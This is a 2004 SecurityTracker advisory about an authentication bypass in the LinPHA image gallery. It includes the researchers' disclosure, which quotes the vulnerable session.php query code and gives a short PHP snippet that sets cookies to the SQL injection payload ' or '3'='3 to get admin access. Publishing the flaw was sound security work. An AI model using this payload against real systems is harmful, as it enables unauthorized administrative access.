SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Generic)  >  LinPHA Vendors:  linpha.sourceforge.net
LinPHA Authentication Flaw Grants Administrative Access to Remote Users
SecurityTracker Alert ID:  1010813
SecurityTracker URL:  http://securitytracker.com/id?1010813
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 29 2004
Impact:  User access via network
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
Version(s): 0.9.4
Description:  A vulnerability was reported in the LinPHA image gallery software. A remote user can obtain administrative access to the application.

Ruban Molina and Fernando Quintero reported that a remote user can set specially crafted cookie values and then access the 'admin.php' script to be successfully authenticated to the script. If the 'linpha_userid' and 'linpha_password' cookies are set and have a non-null value, the remote user can gain access.
Impact:  A remote user can obtain administrative access on the application.
Solution:  The vendor has released a fix, available via CVS.
Vendor URL:  linpha.sourceforge.net/ (Links to External Site)
Cause:  Authentication error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  Ruban_Molina <ruben@udea.edu.co>
Message History:   None.

 Source Message Contents
Date:  Thu, 29 Jul 2004 20:48:12 +0700 (ICT)
From:  Ruban_Molina <ruben@udea.edu.co>
Subject:  Linpha 0.9.4: authentication bypass

 


/////////////////////////////////////////////////////


////		Vulnerable Program: Linpha
////
//// 		Url: http://linpha.sf.net
////
//// 		Version: 0.9.4 Latest version
////
//// 		Date: Today, July 28 of 2004
////
//// 		Author: Fernando Quintero (a.k.a nonroot)
////       	 Email: nando@udea.edu.co

//////////////////////////////////////////////////////


  I. Affected software description:

  LinPHA is easy to use, multilingual, flexible photo/image
archive/album/gallery
  written in PHP.
  It uses a SQL database to store information about your pictures. It
comes with a
  HTML based installer, so you don't need experience in setting up SQL DB


  II. Bug

  There is a bug in the code that allows a possible attacker to bypass the
authentication
  of the linpha admin.
  It can do it without using a password, you only have to modify the
cookies of the
  session, and then browsing the admin.php script

  The bug is  located aproximately in  [25]  of the session.php file:

  1. Sql injection allows to bypass the auth

 // Read Cookie

     24 if(read_config('autologin')) {

     25 if(!isset($_SESSION['user_name']) &&
isset($_COOKIE["linpha_userid"]) && $_COOKIE["linpha_userid"]!=""&&
isset($_COOKIE["linpha_password"])&&$_COOKIE["linpha_

        password"]!="")

     26         {

     27                 $query_username = $GLOBALS['db']->Execute("SELECT
nickname, level, groups FROM ".PREFIX."users ".

     28                         "WHERE ID =
'".$_COOKIE["linpha_userid"]."' AND ".

     29                         "password =
'".$_COOKIE["linpha_password"]."'");

     30

     31                 if($row = $query_username->FetchRow())

     32                 {

     33                         $_SESSION["REMOTE_ADDR"] =
@$_SERVER["REMOTE_ADDR"];

     34                         $_SESSION["user_name"] = $row[0];

     35                         $_SESSION["user_pass"] =
$_COOKIE["linpha_password"];

     36                         $_SESSION["user_level"] = $row[1];        
     // Store user level

     37                         $_SESSION["user_groups"] = $row[2];       
     // Store user group membership

     38                 }

     39                 else    // wrong cookie

     40                 {

     41                         setcookie("linpha_userid");     // delete
cookie linpha_userid

     42                         setcookie("linpha_password");   // delete
cookie linpha_password

     43                 }

     44         }

     45 }

  There are two cookies that are validated: linpha_userid and
linpha_password.

  So,I would be get in without a password If I inject those cookies  .



  I wrote this lines in a test.php:



      1 <?PHP

      2 setcookie("linpha_userid","1",time()+86400*365,'/linpha');

      3 setcookie("linpha_password","' or
'3'='3",time()+86400*365,'/linpha');

      4 ?>



  The script is loaded before the admin.php file, then the new cookies will
  inject the query in [29].


  This is posibble if the magic_quote variable is setting to Off in the
php.ini.

  but anyway, these cookies should be checked before using it in the query.


  ok, That's it!



III. Solution
     ¨¨¨¨¨¨¨¨
    The main coder was contacted and the code was fixed in the cvs ;).


IV.  Greetings

    - Greets to GIGAX people, Sandra195 specially
    - Greets All the community. I learn of you!

V.  Contact

    Fernando Quintero
    nando@udea.edu.co
    Medellín-Colombia

VI. Final words

    !!! Viva Colombia !!!!!!!!


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2004, SecurityGlobal.net LLC